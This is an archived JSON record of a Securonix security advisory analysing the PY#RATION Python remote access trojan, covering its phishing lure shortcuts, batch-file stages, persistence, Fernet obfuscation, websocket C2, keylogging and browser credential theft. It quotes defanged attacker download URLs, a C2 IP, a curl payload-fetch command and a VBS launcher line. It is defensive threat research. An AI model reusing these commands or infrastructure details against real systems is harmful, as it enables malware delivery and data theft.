{
	"id": "7c6d30b8-67c1-4e6f-80bb-2d253955dee0",
	"created_at": "2026-04-06T00:10:43.215573Z",
	"updated_at": "2026-04-10T03:21:24.877496Z",
	"deleted_at": null,
	"sha1_hash": "646a842780c501653b116c1c7e1a41fd7fd9d07a",
	"title": "Securonix Security Advisory: Python-Based PY#RATION Attack Campaign Leverages Fernet Encryption and Websockets to Avoid Detection",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3434854,
	"plain_text": "Securonix Security Advisory: Python-Based PY#RATION Attack\r\nCampaign Leverages Fernet Encryption and Websockets to Avoid\r\nDetection\r\nArchived: 2026-04-05 14:38:10 UTC\r\nBy Securonix Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nFigure 1: PY#RATION payload\r\nIntroduction\r\nThe Securonix Threat Research Team has identified a new Python-based attack campaign (tracked by Securonix\r\nas PY#RATION) in the wild. The malware exhibits remote access trojan (RAT) behavior, allowing for control of\r\nand persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and\r\ncapabilities, including data exfiltration and keylogging. What makes this malware particularly unique is its\r\nutilization of websockets for both command and control (C2) communication and exfiltration as well as how it\r\nevades detection from antivirus and network security measures.\r\nThe use of Python for malicious purposes is increasing, and is noteworthy for its similarities to Go-based\r\nmalware, as demonstrated by the GO#WEBBFUSCATOR attack campaign we covered previously. To illustrate,\r\nmalicious code can be compiled and “packed” into an executable requiring no outside code or library\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 1 of 17\n\ndependencies, making cross-platform support possible. Creating Python executables in Windows can be trivial and\r\nrequires only the knowledge of a few existing tools such as Py2exe or auto-py-to-exe, for example.\r\nIn this case, starting in August 2022, we identified malicious payload samples associated with this attack\r\ncampaign containing v1.0 in the code. Today our latest identified payload sample contains v1.6.0 meaning the\r\nmalicious payloads used by the attackers as part of this campaign went through several enhancement interactions\r\nand are still under development. It is also apparent that new features and anti-evasion techniques have since been\r\nintroduced into the later versions.\r\nTechnical analysis: initial compromise\r\nInitial infection of PY#RATION begins with a phishing email containing a malicious attachment .zip file,\r\ndocuments.zip in our case for v1.6.0. The zip file is password protected. Since we didn’t have access to the body\r\nof the email, after some brute forcing the password “1988” was discovered. Typically this password would have\r\nbeen found in the body of the email.\r\nContained inside the zip file are two shortcut (.lnk) files that reference two corresponding files located on a remote\r\nC2 server, front.jpg(.lnk) and back.jpg(.lnk). The shortcuts appear as an image icon with a link to add validity to\r\nthe lure. When the shortcut is executed, the remote server is contacted to download two additional files to the\r\nuser’s temp directory.\r\nFigure 1a: Observed PY#RATION attack chain\r\nStage 1: .LNK shortcut file execution\r\nCode execution begins similarly to most phishing-based malware we see today. Once the zip file is extracted, the\r\nuser is presented with two convincing .lnk files disguised as the two .jpg files. When executed by the user a front\r\nand back image of a seemingly valid UK driver’s license is displayed along with the malicious code.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 2 of 17\n\nFigure 2: v1.0 shortcut .lnk lure files front.jpg (left) and back.jpg (right) [PII removed]\r\nThe lure files are presented to the user upon executing the corresponding shortcut (.lnk) files in addition to the\r\nmalicious code front.bat and back.bat as seen in the figure below. We’ll dive into the contents of the .bat files\r\nfurther down. In any malware scenario, the purpose of the lure files is simply to present the victim user with an\r\nexpected result in an attempt not to arouse suspicion.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 3 of 17\n\nFigure 3: v1.0 shortcut .lnk files\r\nEach .lnk file downloads the .txt files. The files are then renamed to .bat files and then executed.\r\nfront.jpg.lnk – hxxps://install.realproheros[.]com/front.txt\r\nback.jpg.lnk – hxxps://install.realproheros[.]com/back.txt\r\nThis brings us into stage 2 of the initial infection. Malicious VB script is then echoed into another file, “c.txt” in\r\nour case. Wscript.exe is then called to execute the newly built file as seen in figure 4 below.\r\nFigure 4: v1.0 front.bat\r\nAs you can see in the image, front.jpg is downloaded and saved into settings.bat.  The contents of\r\nhxxps://install[.]realproheros.com/c.txt is then outputted into c.bat which is then outputted into b.bat.\r\nThe file settings.bat simply downloads and executes the front.jpg in this case which opens the lure image of the\r\nfront of the drivers license as seen in figure 1.\r\nWhen analyzing version 1.6.0, the initial code execution vector beginning from the shortcut file is slightly\r\ndifferent. While the technique originating with “front.jpg.lnk” “and back.jpg.lnk” remains unchanged, the initial\r\nscript is pulled down from pastebin.\r\nhxxps://pastebin[.]com/raw/Mb7zPnML\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 4 of 17\n\nFigure 5: v1.6.0 front.jpg.lnk and front.bat\r\nStage2: Batch file execution\r\nWhen we take a look at the contents of the “c.bat” files, things start to get very interesting which leads us into\r\nstage 2 of the initial compromise chain. Below is a screenshot of the v1.0 sample we identified last year.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 5 of 17\n\nFigure 6: v1.0 c.bat contents\r\nThe batch file begins by creating directories in the user’s %tmp$ directory, Cortana, and Cortana/Setup.\r\nIt then dumps the contents of lines 6-24 into another file in %tmp/CortanaDefault.bat. This file essentially checks\r\nfor the existence of a few files, and then downloads them:\r\nhxxps://install[.]realproheros.com/unrar.cert – unrar.cert\r\nhxxps://install[.]realproheros.com/setup.rar – setup.rar\r\nhxxps://install[.]realproheros.com/assist.rar – assist.rar\r\nNext, the Microsoft utility certutil.exe is leveraged to decode “unrar.cert” into the exe file “unrar.exe” which is\r\nthen executed and extracts the contents of “assist.rar” and then “setup.rar” using the password “2022” for v1.0 or\r\nthe password “P@2022” for version 1.6.0.\r\nOne of the extracted files “ctask.exe” is then executed using the parameter “rmpath” and the value\r\n“433a2f57696e646f7773202f” which is the hex value of “C:/Windows“.\r\nA basic .vbs script is created and saved as “%tmp%/Cortana/inv.vbs” which accepts two parameters, the first\r\nbeing the name of an executable to run, the second being parameters for that executable:\r\necho CreateObject^(“Wscript.Shell”^).Run “””” ^\u0026 WScript.Arguments^(0^) ^\u0026 “”””, 0, False\r\nThe executable “ctask.exe” is once again executed using the parameters “movepath\r\n25746d70252f436f7274616e61 256c6f63616c6170706461746125” which when decoded from hex becomes\r\n“/%tmp%/Cortana” and “%localappdata%”\r\nPersistence is established by dropping CortanaAssist.bat into the local user’s startup directory\r\n“%appdata%/Microsoft/Windows/Start Menu/Programs/Startup/CortanaAssist.bat” This will cause it to execute\r\nevery time the user starts their workstation.\r\nExamining version 1.6.0, the end goal is essentially the same. Interestingly enough, as you can see at the end of\r\nalmost every primary action, there is some error checking which sends a status probe back to the attacker\r\nindicating the script’s progress.\r\nhxxps://api.safeit[.]com/install/log?error=[error_message]\r\nThe domain used here is rather interesting. The site safeit.com is a legitimate website that has been in existence\r\nsince the 90’s which offers secure file deletion products. The subdomain api.safeit[.]com appears to have been\r\nvery short lived. Its purpose as well as its relation to the attackers behind the malware remains unknown.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 6 of 17\n\nFigure 7: v1.6.0 c.bat contents\r\nIn the case of each file version the main goal is to download and extract a binary payload through a series of bat\r\nfiles. The payload is rather interesting and functions as a Python-based RAT. We’ll dig into this in the next section.\r\nAnalysis: Python Binary CortanaAssistance.exe\r\nAs we briefly touched on earlier, it’s possible to pack an executable using automated tools that take Python code\r\nand convert it to an all-in-one Windows executable. This can easily be done using automated tools such as\r\npyinstaller or py2exe.  This Python-packed binary will contain all the required Python libraries needed for the\r\noriginal code to execute properly on any Windows system. The side effect is that the binary file ends up being\r\nquite large.\r\nThe v1.0 binary file “CortanaAssistance.exe” is a 32-bit executable and is on the larger size standing at just over\r\n14MB. Version 1.6.0 is much larger at just over 32MB. Both were packed using Python v3.10.0.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 7 of 17\n\nFigure 8: PE binary information for CortanaAssistance.exe\r\nAs the binary is a Py2exe packed executable, we can extract the file’s contents using a tool like pyinstxtractor into\r\nanother directory to examine it. As seen in figure 9 below, this mostly contains Python library files. What interests\r\nus, however, is the main function, “main.pyc” which contains the compiled Python bytecode of the original script.\r\nFigure 9: CortanaAssistance.exe extracted contents\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 8 of 17\n\nUsing a Python decompiler, main.pyc can be decompiled into its original Python code. The original Python script\r\nwas compiled in Python version 3.10.0. By analyzing the original code we get a better understanding as to the\r\ncapabilities of the malware.\r\nPython code: v1.0 vs 1.6.0\r\nThe difference between the two versions is quite staggering. With about 1000 lines of code added in v1.6.0 as\r\ncompared to our original discovered sample, it’s overall quite telling that this particular Python RAT is still under\r\ndevelopment.\r\nThe 1.6.0 version’s main Python code was also hidden behind a trivial layer of fernet, an implementation which is\r\npart of a recipe from the Python cryptography package that can be used to encrypt and authenticate data. This\r\nhelps attackers reduce the ability for AV detections to trigger on anything malicious as it masked many easily\r\nidentifiable strings compared to v1.0 of the binary.\r\nFigure 10: v1.6.0 main.py showing fernet encryption\r\nThe original source code is decrypted and executed as seen in the figure above.\r\nOnce decrypted the later version also features much cleaner code with formal comment blocks at each function or\r\nclass which clearly describe its intended purpose. Because of this, it is easy to conclude that this RAT is being\r\nsold, though at the time of writing we are not able to confirm this or identify its original origin.\r\nNext, let’s dive into several interesting classes contained within the Python RAT’s source code.\r\nPython code: app class\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 9 of 17\n\nBoth analyzed versions of the original Python code contain a class “app” which handles basic configuration\r\nparameters such as IP and port information. They’re both configured to the same IP address 169[.]239.129.108\r\nand port 5555 which downloads and reads in a configuration file “/client/config” It’s quite surprising that the same\r\nIP was used over a four-month period and is still active at the time of writing.\r\nFigure 11: main.py containing class app and connection strings\r\nThe later version adds some sessioning capabilities which leverage the function get_unique_identity() which\r\nconsists of the target host’s MAC address and user name. The configuration parameter IN_NETWORK_SCAN is\r\nalso new and makes use of the Python class NetworkScanner, which as its name suggests, attempts to probe the\r\nsurrounding network for IPs and ports.\r\nPython code: NetworkScanner class\r\nUnique to v1.6.0, this enables the Python RAT with added network enumeration capabilities over prior versions.\r\nThe class has a few tunable configuration parameters which define port ranges, batch size, and sleep time.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 10 of 17\n\nFigure 12: main.py showing class NetworkScanner\r\nPython code: actions class\r\nThe “actions” class gives the attacker the ability to transfer files from host to C2 or vice versa. The code block was\r\nalmost identical between the two versions, other than the addition of the unique identity added to the headers in\r\nv1.6.0.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 11 of 17\n\nFigure 13: main.py with actions class v1.0\r\nPython code: KeyRecorder class\r\nThe not-so-subtle “KeyRecorder” class does just as the name suggests — it acts as a keylogger that lets the\r\nattacker record the victim’s keystrokes once infection has fully taken place. Other than some slight code variations\r\nand trimming, the classes between the two identified versions were functionally the same.\r\nFigure 14: main.py showing KeyRecorder class v1.0\r\nThe malware features several more classes that allow for additional functionality such as the “Command” class.\r\nThis allows the attacker to interact with the system by issuing shell commands. Other classes allow for general\r\nenumeration which provides system information and antivirus protection status.\r\nPython code: other classes and functions\r\nAfter analyzing the source code, we can determine that the PY#RATION malware contains the following\r\nadditional functionalities:\r\nHost enumeration\r\nSystem shell commands\r\nDownload/upload files\r\nPassword/cookie extraction from browser stores\r\nNSSProxy functionality\r\nSystem enumeration\r\nClipboard stealer\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 12 of 17\n\nAntivirus detection/enumeration\r\nAnalysis: C2 communication and infrastructure\r\nAnother aspect which makes this malware unique is the fact that it leverages websockets to establish C2\r\ncommunication back to the attacker’s server.\r\nThe WebSocket protocol works over a single TCP connection, but unlike HTTP or HTTPS it uses an API standard\r\nwhich upgrades the HTTP connection. The upgraded connection will typically work over port 80 or 443. However\r\nonce the connection has been upgraded, WebSockets can enable streams of messages using full-duplex\r\ncommunication, which is currently not available over a standard HTTP or HTTPS connection.\r\nUsing WebSockets for C2 communication is less common as it requires much more time to configure the remote\r\nC2 server than with other, more common methods.\r\nThe PY#RATION malware leverages Python’s built in Socket.IO framework which provides features to both\r\nclient and server WebSocket communication.\r\nFigure 15: Socket.IO and WebSockets C2\r\nSurprisingly enough, only a single IP address was identified throughout the total attack chain for C2\r\n(“169[.]239.129.108”) was used by the attackers. Again, from v1.0 back in August to v1.6.0 found in this month’s\r\nsample, the sole IP remained the same and is still online at the time of writing.\r\nToday, the IP address scores a surprisingly well 0/106 blacklist score on IPVOID, meaning that this particular\r\ncampaign has gone undetected for quite some time.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 13 of 17\n\nFurther analysis: post exploitation bonus round\r\nAfter executing the 1.0 version of the malware, the attackers downloaded an additional executable, “one.exe”\r\nwhich they then used to execute commands. The executable was also a Python packed .exe file, which allowed for\r\ncode execution. The file was downloaded by the attackers using curl with the following command:\r\ncurl.exe “hxxps://install[.]realproheros.com/one.rar”\r\nThe contents were extracted and one.exe was executed along with given parameters:\r\nProcess CommandLine\r\ncmd.exe c:\\windows\\system32\\cmd.exe /c “”%%tmp%%/one.exe” driver=chrome”\r\none.exe “c:\\users\\jalston\\appdata\\local\\temp/one.exe” driver=chrome\r\none.exe “c:\\users\\jalston\\appdata\\local\\temp/one.exe” driver=chrome\r\nThe file contained an embedded Python code file called “one_encrypted.pyc”. When decoded using the same\r\nmethods in the previous executable, a large encrypted string encrypted with Fernet was presented. This same\r\ntechnique was also present in the v1.6.0 main.py Python code found within the binary.\r\nFigure 16: one_encrypted.py with fernet encryption\r\nDecoding the encrypted fernet string by replacing “exec” strings with “print” presents us with additional Python\r\ncode which gives us insights as to the purpose of this executable.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 14 of 17\n\nThe “one.exe” appears to be another variant of another Python-based Infostealer malware, which grabs and\r\nextracts local PC data including browser credential stores, cryptocurrency wallets, and user and system data.\r\nFigure 17: decoded fernet code snippet affecting browser stores and crypto\r\nAbove, we listed command flags associated with “one.exe”, for example “driver=chrome”. The purpose of that\r\nflag is to specify a broad target for the malware to execute and run against. In this case, browser data is recorded,\r\nparsed and sent out to C2 as seen in figure 18.\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 15 of 17\n\nFigure 18: browser data extraction\r\nThe similarity between the two binaries are striking as both leverage Python as the main programming language,\r\nall in a Windows executable format. Even though they serve two completely different functions, it would appear\r\nthat both originated from the same threat actor.\r\nWhile this additional binary sample is interesting, the source or origin appears to be the same as the original\r\nPython RAT. Much of the functionality of one.exe appears to have been included in the later v1.6.0 of the\r\nPython RAT.\r\nConclusion\r\nThe PY#RATION malware is not only relatively difficult to detect, the fact that it is a Python compiled binary\r\nmakes this extremely flexible as it will run on almost any target including Windows, OSX, and Linux variants.\r\nPython packages do not need to be installed on the host as all of the needed libraries are self-contained in the\r\nexecutable itself.\r\nAt the time of writing, the v1.6.0 of the malware only produced 1/70 detections according to VirusTotal. Malicious\r\ncode packed into .exe files using PyInstaller or py2exe are already difficult to detect. The fact that the threat actors\r\nleveraged a layer of fernet encryption to hide the original source compounds the difficulty of detecting known\r\nmalicious strings.\r\nAs English appears to be the consistent language throughout, and the lure images are of a UK driver’s license, it’s\r\nlikely that the intended target could be the UK or North America.\r\nSecuronix recommendations and mitigations\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 16 of 17\n\nAvoid opening any attachments especially from those that are unexpected or are from outside the\r\norganization. Be extra vigilant with .zip, .iso, and .img attachments.\r\nImplement an application whitelisting policy to restrict the execution of unknown binaries\r\nDeploy additional process-level logging such as Sysmon for additional log detection coverage\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below\r\nFor customers, we have a follow up with recommended detections on how to detect and mitigate PY#RATION\r\nattacks using Securonix.\r\nReferences\r\nLOLbas-Project: Mshta.exe\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Mshta/\r\nPython Malware On The Rise, July 14, 2020: https://www.cyborgsecurity.com/cyborg-labs/python-malware-on-the-rise/\r\nGithub – Py2exe:\r\nhttps://github.com/py2exe/py2exe\r\nGithub – auto-py-to-exe:\r\nhttps://github.com/brentvollebregt/auto-py-to-exe\r\nThe Socket.IO Server: https://python-socketio.readthedocs.io/en/latest/server.html\r\nio – Fernet (symmetric encryption)\r\nhttps://cryptography.io/en/latest/fernet/\r\nAttack surface reduction rules reference, 06/28/2022 https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide\r\nSource: https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 17 of 17\n\nquite large. The v1.0 binary file “CortanaAssistance.exe”  is a 32-bit executable and is on the larger size standing at just over\n14MB. Version 1.6.0 is much larger at just over 32MB. Both were packed using Python v3.10.0.\n   Page 7 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/"
	],
	"report_names": [
		"security-advisory-python-based-pyration-attack-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434243,
	"ts_updated_at": 1775791284,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/646a842780c501653b116c1c7e1a41fd7fd9d07a.pdf",
		"text": "https://archive.orkl.eu/646a842780c501653b116c1c7e1a41fd7fd9d07a.txt",
		"img": "https://archive.orkl.eu/646a842780c501653b116c1c7e1a41fd7fd9d07a.jpg"
	}
}